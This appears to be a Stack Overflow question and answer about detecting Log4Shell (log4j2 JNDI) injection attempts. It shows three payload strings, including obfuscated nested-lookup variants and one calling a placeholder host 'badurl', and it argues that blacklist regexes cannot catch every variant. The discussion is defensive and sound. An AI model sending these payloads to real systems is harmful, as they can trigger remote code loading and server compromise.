
Recently the log4j2 vulnerability has been widely spread; the basic JNDI lookup can be as easy as


${jndi:ldap://127.0.0.1:3089/}

But this isn't the common way of doing it. I have seen some hackers trying to use pattern lookups as complex as


${${::-j}${::-n}${::-d}${::-i})

I would like to know which document this is based on. How can we know what other patterns they can inject?

Basil Bourque
taymedee
    Are you trying to blacklist some regex to sanitize your input? That is just a partial solution: you will never have any guarantee that you didn't miss a pattern. To make sure your input is safe you should instead whitelist what you accept, not blacklist what you reject. – wi2ard Dec 15 '21 at 09:10

1 Answer


There might not be infinite combinations, but there are way too many ways to describe the JNDI LDAP protocol to describe all of them in one regular expression to detect them.

One more example: ${jndi:${lower:l}${lower:d}ap://badurl}

You will find many more in blog posts about the detection of the attack.

You should search your logs for the main simple patterns to identify whether you were attacked, but the absence of a detection is not a guarantee that you were not attacked. Just as a test can only show that the tested input works, it cannot validate that the function under test behaves correctly for every input.

Simulant